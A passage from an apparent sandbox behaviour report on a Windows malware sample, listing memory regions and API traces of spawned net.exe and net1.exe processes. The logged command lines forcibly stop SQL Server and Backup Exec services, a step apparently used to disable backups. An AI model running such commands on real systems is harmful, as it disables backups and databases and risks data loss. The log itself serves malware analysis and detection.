region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7400 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7401 start_va = 0xff360000 end_va = 0xff392fff entry_point = 0xff360000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7402 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7403 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7404 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 7405 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7406 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 7407 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7408 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7424 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7425 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7426 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7427 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7428 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7429 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7430 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7431 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7432 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7433 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7434 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7435 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7436 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7437 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7438 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7439 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7440 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7441 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7442 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7443 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7444 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7445 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7446 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7500 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 619 os_tid = 0xa84 [0102.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd90 | out: lpSystemTimeAsFileTime=0x18fd90*(dwLowDateTime=0xf2758a90, dwHighDateTime=0x1d48689)) [0102.824] GetCurrentProcessId () returned 0xb78 [0102.824] GetCurrentThreadId () returned 0xa84 [0102.824] GetTickCount () returned 0x23793 [0102.825] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd98 | out: lpPerformanceCount=0x18fd98*=1814974300000) returned 1 [0102.826] GetModuleHandleW (lpModuleName=0x0) returned 0xff360000 [0102.826] __set_app_type (_Type=0x1) [0102.826] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff379c9c) returned 0x0 [0102.826] __getmainargs (in: _Argc=0xff384780, _Argv=0xff384790, _Env=0xff384788, _DoWildCard=0, _StartInfo=0xff38479c | out: _Argc=0xff384780, _Argv=0xff384790, _Env=0xff384788) returned 0 [0102.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0102.827] GetConsoleOutputCP () returned 0x1b5 [0102.885] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff38cec0 | out: lpCPInfo=0xff38cec0) returned 1 [0102.885] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0102.887] sprintf_s (in: _DstBuf=0x18fd38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0102.887] setlocale (category=0, locale=".437") returned="English_United States.437" [0102.889] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.889] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0102.889] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$BKUPEXEC /y" [0102.889] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0102.889] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0102.889] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fd28 | out: Buffer=0x18fd28*=0x384d50) returned 0x0 [0102.889] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fd28 | out: Buffer=0x18fd28*=0x38c100) returned 0x0 [0102.889] _fileno (_File=0x7fefdba2a80) returned 0 [0102.889] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0102.890] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0102.890] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0102.890] _wcsicmp (_String1="config", _String2="stop") returned -16 [0102.890] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0102.890] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0102.890] _wcsicmp (_String1="file", _String2="stop") returned -13 [0102.890] _wcsicmp (_String1="files", _String2="stop") returned -13 [0102.890] _wcsicmp (_String1="group", _String2="stop") returned -12 [0102.890] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0102.890] _wcsicmp (_String1="help", _String2="stop") returned -11 [0102.890] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0102.890] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0102.890] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0102.890] _wcsicmp (_String1="session", _String2="stop") returned -15 [0102.890] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0102.890] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0102.890] _wcsicmp (_String1="share", _String2="stop") returned -12 [0102.890] _wcsicmp (_String1="start", _String2="stop") returned -14 [0102.890] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0102.890] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0102.890] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0102.890] _wcsicmp (_String1="accounts", _String2="MSSQL$BKUPEXEC") returned -12 [0102.890] _wcsicmp (_String1="computer", _String2="MSSQL$BKUPEXEC") returned -10 [0102.890] _wcsicmp (_String1="config", _String2="MSSQL$BKUPEXEC") returned -10 [0102.890] _wcsicmp (_String1="continue", _String2="MSSQL$BKUPEXEC") returned -10 [0102.890] _wcsicmp (_String1="cont", _String2="MSSQL$BKUPEXEC") returned -10 [0102.890] _wcsicmp (_String1="file", _String2="MSSQL$BKUPEXEC") returned -7 [0102.890] _wcsicmp (_String1="files", _String2="MSSQL$BKUPEXEC") returned -7 [0102.891] _wcsicmp (_String1="group", _String2="MSSQL$BKUPEXEC") returned -6 [0102.891] _wcsicmp (_String1="groups", _String2="MSSQL$BKUPEXEC") returned -6 [0102.891] _wcsicmp (_String1="help", _String2="MSSQL$BKUPEXEC") returned -5 [0102.891] _wcsicmp (_String1="helpmsg", _String2="MSSQL$BKUPEXEC") returned -5 [0102.891] _wcsicmp (_String1="localgroup", _String2="MSSQL$BKUPEXEC") returned -1 [0102.891] _wcsicmp (_String1="pause", _String2="MSSQL$BKUPEXEC") returned 3 [0102.891] _wcsicmp (_String1="session", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="sessions", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="sess", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="share", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="start", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="stats", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="statistics", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="stop", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="time", _String2="MSSQL$BKUPEXEC") returned 7 [0102.891] _wcsicmp (_String1="user", _String2="MSSQL$BKUPEXEC") returned 8 [0102.891] _wcsicmp (_String1="users", _String2="MSSQL$BKUPEXEC") returned 8 [0102.891] _wcsicmp (_String1="msg", _String2="MSSQL$BKUPEXEC") returned -12 [0102.891] _wcsicmp (_String1="messenger", _String2="MSSQL$BKUPEXEC") returned -14 [0102.891] _wcsicmp (_String1="receiver", _String2="MSSQL$BKUPEXEC") returned 5 [0102.891] _wcsicmp (_String1="rcv", _String2="MSSQL$BKUPEXEC") returned 5 [0102.891] _wcsicmp (_String1="netpopup", _String2="MSSQL$BKUPEXEC") returned 1 [0102.891] _wcsicmp (_String1="redirector", _String2="MSSQL$BKUPEXEC") returned 5 [0102.891] _wcsicmp (_String1="redir", _String2="MSSQL$BKUPEXEC") returned 5 [0102.891] _wcsicmp (_String1="rdr", _String2="MSSQL$BKUPEXEC") returned 5 [0102.891] _wcsicmp (_String1="workstation", _String2="MSSQL$BKUPEXEC") returned 10 [0102.891] _wcsicmp (_String1="work", _String2="MSSQL$BKUPEXEC") returned 10 [0102.891] _wcsicmp (_String1="wksta", _String2="MSSQL$BKUPEXEC") returned 10 [0102.891] _wcsicmp (_String1="prdr", _String2="MSSQL$BKUPEXEC") returned 3 [0102.891] _wcsicmp (_String1="devrdr", _String2="MSSQL$BKUPEXEC") returned -9 [0102.891] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$BKUPEXEC") returned -1 [0102.891] _wcsicmp (_String1="server", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="svr", _String2="MSSQL$BKUPEXEC") returned 6 [0102.891] _wcsicmp (_String1="srv", _String2="MSSQL$BKUPEXEC") returned 6 [0102.892] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$BKUPEXEC") returned -1 [0102.892] _wcsicmp (_String1="alerter", _String2="MSSQL$BKUPEXEC") returned -12 [0102.892] _wcsicmp (_String1="netlogon", _String2="MSSQL$BKUPEXEC") returned 1 [0102.892] _wcsupr (in: _String="MSSQL$BKUPEXEC" | out: _String="MSSQL$BKUPEXEC") returned="MSSQL$BKUPEXEC" [0102.892] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x38ce10 [0102.896] GetServiceKeyNameW (in: hSCManager=0x38ce10, lpDisplayName="MSSQL$BKUPEXEC", lpServiceName=0xff385750, lpcchBuffer=0x18fc48 | out: lpServiceName="", lpcchBuffer=0x18fc48) returned 0 [0102.897] _wcsicmp (_String1="msg", _String2="MSSQL$BKUPEXEC") returned -12 [0102.897] _wcsicmp (_String1="messenger", _String2="MSSQL$BKUPEXEC") returned -14 [0102.897] _wcsicmp (_String1="receiver", _String2="MSSQL$BKUPEXEC") returned 5 [0102.897] _wcsicmp (_String1="rcv", _String2="MSSQL$BKUPEXEC") returned 5 [0102.897] _wcsicmp (_String1="redirector", _String2="MSSQL$BKUPEXEC") returned 5 [0102.897] _wcsicmp (_String1="redir", _String2="MSSQL$BKUPEXEC") returned 5 [0102.897] _wcsicmp (_String1="rdr", _String2="MSSQL$BKUPEXEC") returned 5 [0102.897] _wcsicmp (_String1="workstation", _String2="MSSQL$BKUPEXEC") returned 10 [0102.897] _wcsicmp (_String1="work", _String2="MSSQL$BKUPEXEC") returned 10 [0102.897] _wcsicmp (_String1="wksta", _String2="MSSQL$BKUPEXEC") returned 10 [0102.897] _wcsicmp (_String1="prdr", _String2="MSSQL$BKUPEXEC") returned 3 [0102.897] _wcsicmp (_String1="devrdr", _String2="MSSQL$BKUPEXEC") returned -9 [0102.897] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$BKUPEXEC") returned -1 [0102.897] _wcsicmp (_String1="server", _String2="MSSQL$BKUPEXEC") returned 6 [0102.897] _wcsicmp (_String1="svr", _String2="MSSQL$BKUPEXEC") returned 6 [0102.897] _wcsicmp (_String1="srv", _String2="MSSQL$BKUPEXEC") returned 6 [0102.897] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$BKUPEXEC") returned -1 [0102.897] _wcsicmp (_String1="alerter", _String2="MSSQL$BKUPEXEC") returned -12 [0102.897] _wcsicmp (_String1="netlogon", _String2="MSSQL$BKUPEXEC") returned 1 [0102.897] NetServiceControl (in: servername=0x0, service="MSSQL$BKUPEXEC", opcode=0x0, arg=0x0, bufptr=0x18fc50 | out: bufptr=0x18fc50) returned 0x889 [0102.898] wcscpy_s (in: _Destination=0xff3880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0102.898] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0102.899] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff385b50, nSize=0x800, Arguments=0xff387f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0102.900] GetFileType (hFile=0xb) returned 0x2 [0102.901] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fb18 | out: lpMode=0x18fb18) returned 1 [0102.901] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff385b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18fb10, lpReserved=0x0 | out: lpBuffer=0xff385b50*, lpNumberOfCharsWritten=0x18fb10*=0x1e) returned 1 [0102.901] GetFileType (hFile=0xb) returned 0x2 [0102.901] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fb18 | out: lpMode=0x18fb18) returned 1 [0102.902] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff361efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18fb10, lpReserved=0x0 | out: lpBuffer=0xff361efc*, lpNumberOfCharsWritten=0x18fb10*=0x2) returned 1 [0102.902] _ultow (in: _Dest=0x889, _Radix=1637248 | out: _Dest=0x889) returned="2185" [0102.902] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff385b50, nSize=0x800, Arguments=0xff387f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0102.902] GetFileType (hFile=0xb) returned 0x2 [0102.902] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fb18 | out: lpMode=0x18fb18) returned 1 [0102.903] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff385b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18fb10, lpReserved=0x0 | out: lpBuffer=0xff385b50*, lpNumberOfCharsWritten=0x18fb10*=0x34) returned 1 [0102.903] GetFileType (hFile=0xb) returned 0x2 [0102.903] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fb18 | out: lpMode=0x18fb18) returned 1 [0102.903] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff361efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18fb10, lpReserved=0x0 | out: lpBuffer=0xff361efc*, lpNumberOfCharsWritten=0x18fb10*=0x2) returned 1 [0102.904] NetApiBufferFree (Buffer=0x384d50) returned 0x0 [0102.904] NetApiBufferFree (Buffer=0x38c100) returned 0x0 [0102.904] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$BKUPEXEC /y" [0102.904] exit (_Code=2) Process: id = "180" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x59208000" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7409 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7410 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7411 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7412 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7413 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7414 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7415 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7416 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7417 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7418 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7419 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7420 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7421 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 7422 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7423 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 620 os_tid = 0xb74 Process: id = "181" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x59c45000" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "169" os_parent_pid = "0x9f4" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7447 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7448 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7449 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7450 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 7451 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7452 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7453 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7454 start_va = 0xff360000 end_va = 0xff392fff entry_point = 0xff360000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7455 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7456 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7457 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7458 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7459 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 7460 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7461 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7462 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7463 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7464 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 7465 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7466 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 7467 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7468 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7469 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7470 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7471 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7472 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7473 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7474 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7475 start_va = 0x7fefb810000 end_va = 0x7fefb825fff 